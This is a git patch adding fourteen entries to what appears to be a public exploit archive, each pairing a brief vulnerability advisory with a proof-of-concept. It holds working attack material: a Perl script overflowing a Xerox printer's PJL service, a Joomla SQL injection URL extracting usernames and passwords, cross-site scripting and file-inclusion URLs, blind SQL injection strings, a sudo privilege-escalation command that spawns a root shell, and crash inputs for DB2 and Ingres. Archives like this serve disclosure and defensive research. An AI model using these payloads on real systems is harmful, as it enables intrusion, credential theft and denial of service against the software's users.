From 65f378afeb44ac6cb901a5759798aae5238ef8e3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 31 May 2014 04:36:31 +0000 Subject: [PATCH] Updated 05_31_2014 --- files.csv | 14 +++++++++ platforms/cfm/webapps/33575.txt | 7 +++++ platforms/hardware/dos/33583.pl | 30 +++++++++++++++++++ platforms/hardware/remote/33580.txt | 7 +++++ platforms/linux/dos/33581.txt | 11 +++++++ platforms/linux/local/33576.txt | 11 +++++++ platforms/multiple/dos/33579.txt | 12 ++++++++ platforms/multiple/dos/33584.txt | 10 +++++++ platforms/multiple/remote/33577.txt | 9 ++++++ platforms/multiple/remote/33578.txt | 9 ++++++ platforms/multiple/webapps/33493.txt | 44 ++++++++++++++++++++++++++++ platforms/php/webapps/33514.txt | 16 ++++++++++ platforms/php/webapps/33574.txt | 9 ++++++ platforms/php/webapps/33582.txt | 7 +++++ platforms/unix/local/33572.txt | 14 +++++++++ 15 files changed, 210 insertions(+) create mode 100755 platforms/cfm/webapps/33575.txt create mode 100755 platforms/hardware/dos/33583.pl create mode 100755 platforms/hardware/remote/33580.txt create mode 100755 platforms/linux/dos/33581.txt create mode 100755 platforms/linux/local/33576.txt create mode 100755 platforms/multiple/dos/33579.txt create mode 100755 platforms/multiple/dos/33584.txt create mode 100755 platforms/multiple/remote/33577.txt create mode 100755 platforms/multiple/remote/33578.txt create mode 100755 platforms/multiple/webapps/33493.txt create mode 100755 platforms/php/webapps/33514.txt create mode 100755 platforms/php/webapps/33574.txt create mode 100755 platforms/php/webapps/33582.txt create mode 100755 platforms/unix/local/33572.txt diff --git a/files.csv b/files.csv index 444ed27a6..48a672db2 100755 --- a/files.csv +++ b/files.csv @@ -30174,6 +30174,7 @@ id,file,description,date,author,platform,type,port 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDMS web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 @@ -30191,6 +30192,7 @@ id,file,description,date,author,platform,type,port 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 +33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 @@ -30240,3 +30242,15 @@ id,file,description,date,author,platform,type,port 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 'servercert' Parameter Cross Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0 33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability",2010-01-27,Intevydis,linux,dos,0 +33572,platforms/unix/local/33572.txt,"IBM DB2 'REPEAT()' Heap Buffer Overflow Vulnerability",2010-01-27,"Evgeny Legerov",unix,local,0 +33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 'tid' Parameter Cross Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0 +33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0 +33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0 +33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x Multiple Cross Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 +33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0 +33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow Vulnerability",2010-01-29,"Evgeny Legerov",multiple,dos,0 +33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross Site Scripting Vulnerability",2010-01-29,Yoyahack,hardware,remote,0 +33581,platforms/linux/dos/33581.txt,"Hybserv2 ':help' Command Denial Of Service Vulnerability",2010-01-29,"Julien Cristau",linux,dos,0 +33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0 +33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0 +33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 diff --git a/platforms/cfm/webapps/33575.txt b/platforms/cfm/webapps/33575.txt new file mode 100755 index 000000000..3a9eb7b67 --- /dev/null +++ b/platforms/cfm/webapps/33575.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37986/info + +CommonSpot Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +https://www.example.com/commonspot/utilities/longproc.cfm?onlyurlvars=1&url=%27;--%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E diff --git a/platforms/hardware/dos/33583.pl b/platforms/hardware/dos/33583.pl new file mode 100755 index 000000000..a569bab59 --- /dev/null +++ b/platforms/hardware/dos/33583.pl @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/38010/info + +Xerox WorkCentre is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application. + +Xerox WorkCentre 4150 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl -w + + +use IO::Socket; +if (@ARGV < 1){ +exit +} +$ip = $ARGV[0]; +#open the socket +my $sock = new IO::Socket::INET ( +PeerAddr => $ip, +PeerPort => '9100', +Proto => 'tcp', +); + + +$sock or die "no socket :$!"; +send($sock, "\033%-12345X\@PJL ENTER LANGUAGE = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0); + + + +close $sock; \ No newline at end of file diff --git a/platforms/hardware/remote/33580.txt b/platforms/hardware/remote/33580.txt new file mode 100755 index 000000000..7b5f157bc --- /dev/null +++ b/platforms/hardware/remote/33580.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38004/info + +Comtrend CT-507 IT is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1 \ No newline at end of file diff --git a/platforms/linux/dos/33581.txt b/platforms/linux/dos/33581.txt new file mode 100755 index 000000000..c061da034 --- /dev/null +++ b/platforms/linux/dos/33581.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38006/info + +Hybserv2 is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to deny service to legitimate users. + +Hybserv2 1.9.4 is vulnerable; other versions may also be affected. + +The following example command is available: + +PRIVMSG memoserv :help \t \ No newline at end of file diff --git a/platforms/linux/local/33576.txt b/platforms/linux/local/33576.txt new file mode 100755 index 000000000..48007190e --- /dev/null +++ b/platforms/linux/local/33576.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37996/info + +Battery Life Toolkit (BLTK) is prone to a local privilege-escalation vulnerability. + +A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in the complete compromise of the affected computer. + +This issue affects BLTK 1.0.9; other versions may be vulnerable as well. + +The following proof of concept is available: + +/usr/lib/bltk/bin/bltk_sudo /bin/bash \ No newline at end of file diff --git a/platforms/multiple/dos/33579.txt b/platforms/multiple/dos/33579.txt new file mode 100755 index 000000000..16975844b --- /dev/null +++ b/platforms/multiple/dos/33579.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/38001/info + +Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application. + +Ingres Database 9.3 on Unix is vulnerable; other versions may also be affected. + +s = "\x00\x00\x00\x00" +s += "\xff\xff\xff\xff" +s += "\x3c\x00\x00\x00\x06\x00\x00\x00" +s += "A" * 1000 \ No newline at end of file diff --git a/platforms/multiple/dos/33584.txt b/platforms/multiple/dos/33584.txt new file mode 100755 index 000000000..bfe5fc567 --- /dev/null +++ b/platforms/multiple/dos/33584.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/38018/info + +IBM DB2 is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to cause the application to crash, denying service to legitimate users. + +IBM DB2 9.7 is vulnerable; other versions may also be affected. + +The following sequence of bytes can trigger this vulnerability: +"\x00\x05\x03\x31\x41" \ No newline at end of file diff --git a/platforms/multiple/remote/33577.txt b/platforms/multiple/remote/33577.txt new file mode 100755 index 000000000..49355ffaf --- /dev/null +++ b/platforms/multiple/remote/33577.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37997/info + +XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect XAMPP 1.6.8 and prior; other versions may be affected as well. + +http://www.example.com/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/33578.txt b/platforms/multiple/remote/33578.txt new file mode 100755 index 000000000..1cab98452 --- /dev/null +++ b/platforms/multiple/remote/33578.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37999/info + +XAMPP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +This issue affects XAMPP 1.6.8 and prior; other versions may be vulnerable as well. + +http://www.example.com/xampp/showcode.php?showcode=1&file=../index.php \ No newline at end of file diff --git a/platforms/multiple/webapps/33493.txt b/platforms/multiple/webapps/33493.txt new file mode 100755 index 000000000..c0ad831c6 --- /dev/null +++ b/platforms/multiple/webapps/33493.txt @@ -0,0 +1,44 @@ +# Exploit Title: Multiple Stored XSS +# Software: Maya EDMS +# Software Link: http://www.mayan-edms.com/downloads/Mayan%20EDMS%20v0.13.ova +# Version: 0.13 - latest +# Author: Dolev Farhi, email: dolev(at)openflare(dot)org @f1nhack +# Date: 21.5.2014 +# Tested on: Kali Linux +# Vendor homepage: www.mayan-edms.com + + + +1. About the application: +========================= +Mayan (or Mayan EDMS) is a web-based free/libre document management system for managing documents within an organization + + +2. Vulnerability Description: +=============================== +An attacker is able to create documents and tags with malicious code, potentially stealing admin cookies browsing or editing the documents. + + +3. Steps to reproduce: +======================== +* Stored XSS 1: +Tags -> Create new tag -> -> Save + +any navigation to documents or search will execute the XSS + +* Stored XSS 2: +Setup -> Sources -> Staging folders -> Add new source -> Title it: +Submit -> navigate to edit it again -> XSS executes + +* Stored XSS 3: +Setup -> Bootstrap -> Create new bootstrap setup -> Name -> submit -> XSS + +* Stored XSS 4: +Setup -> Smart links -> Create new smart link -> Title it -> submit -> edit -> XSS executes + + +5. Proof of concept video +http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi + + + \ No newline at end of file diff --git a/platforms/php/webapps/33514.txt b/platforms/php/webapps/33514.txt new file mode 100755 index 000000000..591728673 --- /dev/null +++ b/platforms/php/webapps/33514.txt @@ -0,0 +1,16 @@ +# Exploit Title: Videos Tube SQL Injection and Remote Code Execution +# Google Dork: inurl:"single.php?url=" video +# Date: 05.05.2014 +# Exploit Author: Mustafa ALTINKAYNAK +# Vendor Homepage: http://www.phpscriptlerim.com +# Software Link: http://demo.phpscriptlerim.com/free/videostube/ +# Version: 1.0 + +Description (Aç?klama) +======================== +Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light. + +Vulnerability +======================== +1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool) +2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool) \ No newline at end of file diff --git a/platforms/php/webapps/33574.txt b/platforms/php/webapps/33574.txt new file mode 100755 index 000000000..8045d6908 --- /dev/null +++ b/platforms/php/webapps/33574.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37982/info + +Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Discuz! 6.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/bbs/viewthread.php?tid=">>

XSS By Fatal Error

\ No newline at end of file diff --git a/platforms/php/webapps/33582.txt b/platforms/php/webapps/33582.txt new file mode 100755 index 000000000..35faad773 --- /dev/null +++ b/platforms/php/webapps/33582.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38009/info + +The 'com_rsgallery2' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_rsgallery2&page=inline&id=5&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file diff --git a/platforms/unix/local/33572.txt b/platforms/unix/local/33572.txt new file mode 100755 index 000000000..6b1e345d5 --- /dev/null +++ b/platforms/unix/local/33572.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/37976/info + +IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. + +The issue affects the following: + +IBM DB2 versions prior to 9.1 Fix Pack 9 +IBM DB2 9.7 + +Other versions may also be affected. + +SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1 \ No newline at end of file